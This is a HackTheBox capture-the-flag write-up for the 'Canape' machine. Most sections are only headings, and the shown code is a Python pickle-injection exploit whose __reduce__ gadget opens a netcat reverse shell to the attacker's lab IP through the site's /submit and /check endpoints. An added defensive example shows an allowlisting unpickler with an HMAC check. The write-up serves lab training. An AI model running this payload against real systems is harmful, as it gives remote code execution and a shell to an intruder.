HackTheBox Writeup — Canape

NMAP Results

/.git

http://10.10.10.70/.git
http://10.10.10.70/.git/config
Editing /etc/hosts
git clone (simpsons.git)
cat __init__.py

Pickle Injection Vulnerability

import os
import cPickle
from hashlib import md5
import requests

# Object whose __reduce__ makes the target call os.system() with the reverse
# shell one-liner at the moment it unpickles the serialized data (Python 2)
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('homer;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.89 1234 >/tmp/f',))

shellcode = cPickle.dumps(Exploit())
print shellcode + "\n"
print md5(shellcode).hexdigest()

# Split the pickle on ';' so that the first piece goes into the 'character'
# field and the remaining pieces, joined back together, go into 'quote'
part1 = str(shellcode.split(";")[0])
part2 = str(";" + shellcode.split(";")[1])
part3 = str(";" + shellcode.split(";")[2])
part4 = str(";" + shellcode.split(";")[3])

# Submit the quote; the server stores it keyed by the md5 of the full pickle
r = requests.post("http://10.10.10.70/submit", data={'character': str(part1), 'quote': str(part2 + part3 + part4)})

print r.status_code, r.reason, r.text

# Ask the server to check (unpickle) the stored entry, which triggers the payload
r2 = requests.post("http://10.10.10.70/check", data={'id': md5(shellcode).hexdigest()})

print r2.status_code, r2.reason, r2.text
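Added example (not part of the writeup) showing the defensive side of the same mechanism in Python 3: a `__reduce__` gadget of the same shape as the Exploit class above, with `eval` of a constant standing in for `os.system` so it is harmless, loaded through an allowlisting unpickler that refuses it, plus an HMAC check so untrusted bytes never reach the unpickler at all. The allowlist entry, the key and the sample objects are assumptions for the demo.

```python
import hashlib
import hmac
import io
import pickle
from collections import OrderedDict

class Gadget(object):
    # Same shape as the writeup's Exploit class: __reduce__ names a callable
    # plus arguments, and the unpickler invokes it while loading. The writeup
    # uses os.system; eval of a constant is used here so the demo is harmless.
    def __reduce__(self):
        return (eval, ("6 * 7",))

# Constructed sample inputs: a hostile pickle and a legitimate one.
MALICIOUS = pickle.dumps(Gadget())
BENIGN = pickle.dumps(OrderedDict([("character", "homer"), ("quote", "d'oh")]))

class RestrictedUnpickler(pickle.Unpickler):
    # Allowlist only the globals the application needs to rebuild its objects;
    # builtins.eval, os.system and every other callable are refused.
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))

def unsafe_loads(data):
    return pickle.loads(data)  # runs whatever __reduce__ asked for
def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()
def is_blocked(data):
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False

# Second layer: authenticate the blob before parsing it at all, so untrusted
# bytes never reach the unpickler. Demo key; a real one stays out of the code.
KEY = b"demo-key-not-for-production"
def sign(data):
    return hmac.new(KEY, data, hashlib.sha256).digest() + data

def verify_and_load(blob):
    tag, data = blob[:32], blob[32:]
    if not hmac.compare_digest(tag, hmac.new(KEY, data, hashlib.sha256).digest()):
        raise ValueError("bad MAC, refusing to unpickle")
    return safe_loads(data)
```

`unsafe_loads(MALICIOUS)` returns 42 because the gadget ran on load, while `safe_loads(MALICIOUS)` raises before any callable is resolved; the allowlist only helps if nothing on it can itself run code, which is why the MAC check is the stronger control.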

Reverse Connection Through Python Pickle Injection
Getting tty

CouchDB Privilege Escalation

ps aux | grep homer
Creating our own user on the database
Confirming the user created
Dumping the usernames and passwords
su homer
NMAP Full Port Scan

SSH Connection

SSH Connection Successful
sudo -l
Python Script To Exploit /usr/bin/pip install * as sudo
Command + Listener
Exploit Successful

Getting User Flag

user.txt

Getting Root Flag

root.txt

Vulnerabilities Used To Exploit This Box

References

Python Pickle Injection:

CouchDB Exploitation:

Sudo (/usr/bin/pip install *) Exploitation:

Faisal Husaini

Hacker | Red Teamer | Python Coder | Gamer | Reverse Engineering Lover